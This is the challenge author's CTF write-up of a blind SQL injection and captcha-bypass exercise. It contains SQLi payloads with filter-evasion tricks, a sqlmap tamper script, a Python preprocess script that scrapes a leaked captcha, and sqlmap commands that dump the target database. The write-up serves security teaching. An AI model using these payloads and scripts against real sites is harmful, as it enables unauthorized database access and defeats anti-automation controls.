Exploit SQL Injection and bypass captcha with SQLMAP

Kenzy challenge (Cyber wargames 2022)

SQL Injection + Captcha bypass

Challenge description:
This login page is protected by captcha to deny any brute force attack.
1. The captcha is not fully secure
2. Login page functionality is vulnerable to Blind SQL Injection

Attack vector
Bypassing captcha and getting the flag from database.

Steps to solve this challenge

  1. Detect SQL Injection

If you enter invalid username or password it will show this response message

{"Username":"admin","status":"Invalid username or password"}

If you enter a single ‘ qoute it will show [statement error]

{"Username":"admin'","status":"statement error"}

Tried to enter 2 single qoutes ‘ ‘ it showed

{"Username":"admin","status":"Invalid username or password"}

Its good, it may be vulnerable to Blind SQL Injection
After I passed this payload

admin'or sleep(5) --

I found this reposne

admin'sleep(5)--

I found filters that remove [or , and , spaces]

I bypassed these filters by
1. spaces by => MySQL comment /**/
2. or => oorr
3. and => anandd

I sent this payload

admin'oorr/**/sleep(5)#

Response was delayed to double of 5 secounds => 10 and redirect to admin panel => http://34.175.249.72:60001/kenzy_admin-panel.php

Treasures are always in the database

This means, I should make a full exploitation and dumb the database to get these Treasures :D

I want to run sqlmap but this will be stopped because we have a captcha

2. secound part => Captcha bypass

Inspect element to view src code, and I found the path of captcha.

Go to the path of captcha.php [http://34.175.249.72:60001/scripts/captcha.php] and view response by burpsuite, you will find captcha disclosure but its double encoded in base64

Notic:

You have 2 solutions
1. Write script to get this captcha code which disclosure
2. Write OCR python script to get captcha code from image

Scripting part

I chose to solve the challenge using SQLMap and tamper script to bypass filters and captcha using preprocess

Tamper script to bypass filters

from lib.core.enums import PRIORITY
import re
__priority__ = PRIORITY.LOWEST
def dependencies():
pass
def tamper(payload, **kwargs):
retVal = payload
if payload:
retVal = re.sub(r"(?i)(or)", 'oorr', retVal)
retVal = re.sub(r"(?i)(and)", 'anandd', retVal)
return retVal

preprocess script to bypass captcha

import requests,re,base64
import urllib.parse
def solve_captcha():
try:
cookies = {'PHPSESSID': 'dvtd7c1gss3oldmp4obam7hu6p'}
response = requests.get("http://34.175.249.72:60001/scripts/captcha.php",cookies=cookies ,verify=False)
except Exception as e:
print(e)
fetch_captcha = re.findall(r"CAPTCHA.*", response.text)[0][10:-1]
return fetch_captcha
def preprocess(req):
captcha = solve_captcha()
captcha = base64.b64decode(base64.b64decode(captcha).decode('utf-8')).decode('utf-8')
if req.data:
req.data += b'&captcha='+captcha.encode("utf-8")

SQLMap command

python3 /usr/bin/sqlmap -r req-sqli.txt --banner --prefix="'" --suffix=";#" --batch --tamper=space2comment,tamper-bypass-and-or.py -p username --preprocess solve-captcha-preprocess.py  --technique=B --not-string="statement error" --level=2

Explain the command

--banner : Retrieve DBMS banner
--prefix : Injection payload starting
--suffix : Injection payload ending
--batch : Never ask for user input, use the default behavior
--tamper : Use given script(s) for tampering injection data
--preprocess: Use given script(s) for preprocessing (request)
--technique: SQL injection techniques to use
--not-string: String to match when query is evaluated to False
--level: Level of tests to perform (1-5)
-p : Testable parameter

tamper VS preprocess
tamper script: manuplate in sqlmap queries

preprocess script: manuplate other request parameters away from SQLMap queries and sent before every sqlmap query

Runing these scripts with in SQLMap to automate solving the captcha and dumb the database

python3 /usr/bin/sqlmap -r req-sqli.txt -dbms MySQL -D kenzy -T solve -C flag --dump --prefix="'" --suffix=";#" --batch --tamper=space2comment,tamper-bypass-and-or.py --proxy="http://127.0.0.1:8080" -p username --preprocess solve-captcha-preprocess.py --flush-session --technique=B --not-string="statement error" --level=2

Thank you this was SQL Injection challenge I developped for Arab secuirty cyber war games CTF.

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Abdulrahman-Kamel

Abdulrahman-Kamel

Cyber Security Engineer | Penetration tester